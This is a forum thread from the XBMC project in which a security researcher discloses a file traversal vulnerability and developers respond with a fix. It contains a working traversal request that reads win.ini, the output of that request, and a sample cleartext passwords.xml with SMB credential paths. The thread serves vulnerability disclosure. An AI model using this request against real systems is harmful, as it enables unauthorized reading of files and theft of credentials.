Security issues in XBMC
#1
Got several high risk security issues in XBMC, would like to come in contact with a main developer or someone in charge of XBMC security.

Thanks

Best Regards
Lucas
Reply
#2
just post what you found so they can look at it
Read/follow the forum rules.
For troubleshooting and bug reporting, read this first
Interested in seeing some YouTube videos about Kodi? Go here and subscribe
Reply
#3
(2012-10-31, 21:58)Martijn Wrote: just post what you found so they can look at it

By posting what I found I'd expose thousands of users running XBMC, perhaps 3'rd party to such as openelec etc....

Are you sure that is what you want?

Br,
Lucas
Reply
#4
any xbmc users that has xbmc directly exposed on the net is a fool Smile
Reply
#5
(2012-10-31, 22:01)davilla Wrote: any xbmc users that has xbmc directly exposed on the net is a fool Smile

Alright... that's .. professionally said....

I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have.
Usually takes about a day, since most vendors wan't to keep it under the lid until they have a patch.

Do you wan't them here, or in the bug tracker?

Best regards
Lucas
Reply
#6
Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so i'm not sure what "serious enough" would be.
Reply
#7
(2012-10-31, 22:14)theuni Wrote: Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so i'm not sure what "serious enough" would be.

True story, not here to argue, your call.
There's a lot of things that shouldn't be exposed, that are exposed.

And yes this dates back and effects Eden as well.
I'll post it tomorrow.

Best regards
Lucas


Reply
#8
Seems like this is going to take a couple of extra days, documents etc need to go through review for the coordinated disclosure.
Thanks for baring with me.

Best regards
Lucas
Reply
#9
Quote:Thanks for baring with me.

I guess I can see how a security issue might be likened to being naked...
Always read the XBMC online-manual, FAQ and search the forum before posting.
Do not e-mail XBMC-Team members directly asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting please make sure you read this first.


Image
Reply
#10
You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf
Below is a summary of the File Traversal vulnerability, which allows an attacker to read any file on the system, with the same privileges as the XBMC process.
Since XBMC stores usernames and password in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials.

File traversal vulnerability can be triggered with (Windows request) : http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini


---SNIP---
XBMC File traversal vulnerability

Severity: High

Affected:
XBMC 11 => Nightly build 20121028 Windows version
XBMCbuntu / XBMC 11 for Linux
XBMC 11 11.0 for Respberry Pi
XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 version (Thanks to Matt "hostess" Andreko for the verification.)

Impact
Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC.
Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find
valid network credentials to gain further access. This could lead to full system compromise, or compromise other systems XBMC
has access to.

Request (Windows):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
Output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]Confidential. Proprietary. [5]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml
<passwords>
<path>
<from pathversion="1">smb://192.168.1.2/Movies</from>
<to pathversion="1">smb://someuserConfused[email protected]/Movies/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/tv</from>
<to pathversion="1">smb://someuser2Confused[email protected]/tv/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/Music</from>Confidential. Proprietary. [4]
<to pathversion="1">smb://someuser3Confused[email protected]/Music/</to>
</path>
</passwords>
---SNIP---

Best regards
Lucas
Reply
#11
This was known for a very very long time Smile

And is corrected in lasts Frodo nightly with added security on vfs handler.

When I first reported this the official answer was don't put your Xbmc on Internet it's not secure Smile

Check : http://forum.xbmc.org/showthread.php?tid=81173
Reply
#12
It's the same vulnerability but in a different spot. I'll look into it.
Always read the online manual (wiki), FAQ (wiki) and search the forum before posting.
Do not e-mail Team Kodi members directly asking for support. Read/follow the forum rules (wiki).
Please read the pages on troubleshooting (wiki) and bug reporting (wiki) before reporting issues.
Reply
#13
Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "serveral high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?
Always read the online manual (wiki), FAQ (wiki) and search the forum before posting.
Do not e-mail Team Kodi members directly asking for support. Read/follow the forum rules (wiki).
Please read the pages on troubleshooting (wiki) and bug reporting (wiki) before reporting issues.
Reply
#14
But then there would be no official document and no drama
Reply
#15
(2012-11-04, 13:56)Tolriq Wrote: This was known for a very very long time Smile

And is corrected in lasts Frodo nightly with added security on vfs handler.

When I first reported this the official answer was don't put your Xbmc on Internet it's not secure Smile

Check : http://forum.xbmc.org/showthread.php?tid=81173

The nightly was still vulnerable last time i checked.
And if it has been known for a while, perhaps it's time to fix it?

Best regards
Lucas

(2012-11-04, 15:45)amet Wrote: But then there would be no official document and no drama

You can also say, no official document, nothing gets done.

Best regards
Lucas
(2012-11-04, 15:21)Montellese Wrote: Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "serveral high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

Nice, way faster then most Smile

Yeah Currently investigation if it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums.
There's two possible issues that are in the 'works'.

You'll know when i know.

Best regards
Lucas
Reply

Logout Mark Read Team Forum Stats Members Help
Security issues in XBMC0